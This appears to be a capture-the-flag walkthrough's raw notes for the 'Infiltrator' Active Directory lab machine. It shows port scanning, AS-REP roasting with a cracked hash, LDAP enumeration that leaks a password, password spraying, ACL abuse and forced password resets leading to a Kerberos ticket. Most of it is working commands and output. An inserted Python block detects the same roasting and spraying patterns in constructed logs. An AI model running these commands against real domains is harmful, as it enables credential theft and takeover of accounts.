53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
15220/tcp open unknown
15230/tcp open unknown
49666/tcp open unknown
49689/tcp open unknown
49691/tcp open unknown
49694/tcp open unknown
49723/tcp open unknown
49747/tcp open unknown
49866/tcp open unknown
Potential usernames were built in x.x format from the names on the website.
nxc ldap infiltrator.htb -u potential_users.txt -p '' --asreproast asreproasting.txt
[email protected]:6bd465884c14ad665eb80e077cb243d6$b4f1e39d63484c5688040d5c28fff01528 e37d85665bb13890a32625d51c7a983bdceae029abaaf2fc7d6936954b88a70b762d8e842639d04196ff46649dc070bb23d1f4e7a8d65015f63035051145064efd546adb48b6b9a3ee95fdb205213 6179bf9a50102dbe79163fb1ca4b712eff70a47e55bfaed27035d2b2ed935b917dc5619a1b5364744a8ca3eb0825fe65ac395a065cd5d39ec5ec4d89e2807456f75fcf0018760613defbe348146c5 72d9ed0ad5303159a2576b6f573ae231e713e5fdd1d119ce6cc15217761489e11e663088bf5cf1dd4f8a17e7ec6802ba00d4cb9d818f334ee719fdb3211095ca1b3925d8
hashcat -a 0 asreproasting.txt /usr/share/wordlists/rockyou.txt
infiltrator.htb\\l.clark:WAT?watismypass!
[Oct 27, 2024 - 20:30:09 (PDT)] exegol-default creds # nxc ldap 10.10.11.31 -u l.clark -p 'WAT?watismypass!' --users
SMB 10.10.11.31 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.31 389 DC01 [+] infiltrator.htb\\l.clark:WAT?watismypass!
LDAP 10.10.11.31 389 DC01 [*] Total of records returned 15
LDAP 10.10.11.31 389 DC01 Administrator Built-in account for administering the computer/domain
LDAP 10.10.11.31 389 DC01 Guest Built-in account for guest access to the computer/domain
LDAP 10.10.11.31 389 DC01 krbtgt Key Distribution Center Service Account
LDAP 10.10.11.31 389 DC01 D.anderson
LDAP 10.10.11.31 389 DC01 L.clark
LDAP 10.10.11.31 389 DC01 M.harris
LDAP 10.10.11.31 389 DC01 O.martinez
LDAP 10.10.11.31 389 DC01 A.walker
LDAP 10.10.11.31 389 DC01 K.turner MessengerApp@Pass!
LDAP 10.10.11.31 389 DC01 E.rodriguez
LDAP 10.10.11.31 389 DC01 winrm_svc
LDAP 10.10.11.31 389 DC01 lan_managment
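d.anderson is a member of Protected Users (per BloodHound), so the account cannot authenticate over NTLM; the commands below use Kerberos (-k) for it.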
[Oct 27, 2024 - 20:58:17 (PDT)] exegol-default creds # nxc smb 10.10.11.31 -u users.txt -p 'WAT?watismypass!' --users -k --continue-on-success
SMB 10.10.11.31 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\Administrator:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\Guest:WAT?watismypass! KDC_ERR_CLIENT_REVOKED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\krbtgt:WAT?watismypass! KDC_ERR_CLIENT_REVOKED
SMB 10.10.11.31 445 DC01 [+] infiltrator.htb\\D.anderson:WAT?watismypass!
SMB 10.10.11.31 445 DC01 [+] infiltrator.htb\\L.clark:WAT?watismypass!
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\M.harris:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\O.martinez:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\A.walker:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\K.turner:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\E.rodriguez:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\winrm_svc:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\lan_managment:WAT?watismypass! KDC_ERR_PREAUTH_FAILED
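An added example, not part of the original notes: a defender-side check over domain controller Kerberos events for the two patterns seen above, a TGT issued without pre-authentication and one source failing pre-authentication against many accounts. The event records, source addresses, thresholds and function names are constructed for illustration; the field meanings follow Security events 4768 and 4771.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def ev(ts, eid, user, status, preauth, ip="10.10.14.7"):
    """Constructed record holding only the 4768/4771 fields the checks read."""
    return {"time": datetime.fromisoformat("2024-10-27T" + ts), "id": eid,
            "user": user.lower(), "status": status, "preauth": preauth, "ip": ip}

# Constructed sample, not real logs: source addresses and times are invented.
SAMPLE = [ev("20:10:01", 4768, "l.clark", "0x0", "0")]   # TGT issued, no pre-auth
SAMPLE += [ev("20:58:17", 4771, u, "0x18", "2") for u in (  # one source, many accounts
    "Administrator", "M.harris", "O.martinez", "A.walker",
    "K.turner", "E.rodriguez", "winrm_svc", "lan_managment")]
SAMPLE += [ev("20:58:18", 4768, u, "0x0", "2") for u in ("D.anderson", "L.clark")]
SAMPLE += [ev(t, 4771, "A.walker", "0x18", "2", ip="10.10.20.5")  # one user mistyping
           for t in ("09:00:01", "09:00:20", "09:01:02")]

def asrep_without_preauth(events):
    """Accounts that received a TGT (4768, status 0x0) with pre-authentication type 0."""
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e["status"] == "0x0" and e["preauth"] == "0"})

def spray_sources(events, window=timedelta(minutes=5), min_accounts=5):
    """Map source IP -> accounts where one source got KDC_ERR_PREAUTH_FAILED (0x18)
    for at least min_accounts distinct accounts inside one time window."""
    fails = defaultdict(list)
    for e in events:
        if e["id"] == 4771 and e["status"] == "0x18":
            fails[e["ip"]].append((e["time"], e["user"]))
    hits = {}
    for ip, rows in fails.items():
        rows.sort()
        for start, _ in rows:
            users = {u for t, u in rows if timedelta(0) <= t - start <= window}
            if len(users) >= min_accounts:
                hits[ip] = sorted(users)
                break
    return hits

def logons_from_spray_sources(events):
    """Accounts that authenticated successfully from a source flagged as spraying."""
    flagged = spray_sources(events)
    return sorted({e["user"] for e in events
                   if e["id"] == 4768 and e["status"] == "0x0" and e["ip"] in flagged})

if __name__ == "__main__":
    print(asrep_without_preauth(SAMPLE), spray_sources(SAMPLE), logons_from_spray_sources(SAMPLE))
```

Accounts returned by `logons_from_spray_sources` are the ones whose passwords should be treated as exposed and reset first.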
d.anderson has GenericAll on the MARKETING DIGITAL OU, which contains e.rodriguez.
Add GenericAll with inheritance on the OU, then reset e.rodriguez's password:
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'd.anderson' -target-dn 'OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB' 'infiltrator.htb'/'d.anderson':'WAT?watismypass!' -k -dc-ip 10.10.11.31
changepasswd.py -newpass 'BruhWhat123' 'infiltrator.htb'/'e.rodriguez':'aa'@'dc01.infiltrator.htb' -reset -altuser d.anderson -altpass 'WAT?watismypass!' -p kpasswd
e.rodriguez → addself to CHIEFS [email protected] → force change password [email protected]
bloodyAD -u e.rodriguez -p BruhWhat123 -d infiltrator.htb --host 10.10.11.31 -v DEBUG add groupMember 'Chiefs Marketing' 'e.rodriguez'
changepasswd.py -newpass 'BruhWhat123' 'infiltrator.htb'/'m.harris':'BruhWhat123'@'dc01.infiltrator.htb' -reset -altuser e.rodriguez -altpass 'BruhWhat123' -p kpasswd
getTGT.py infiltrator.htb/m.harris:BruhWhat123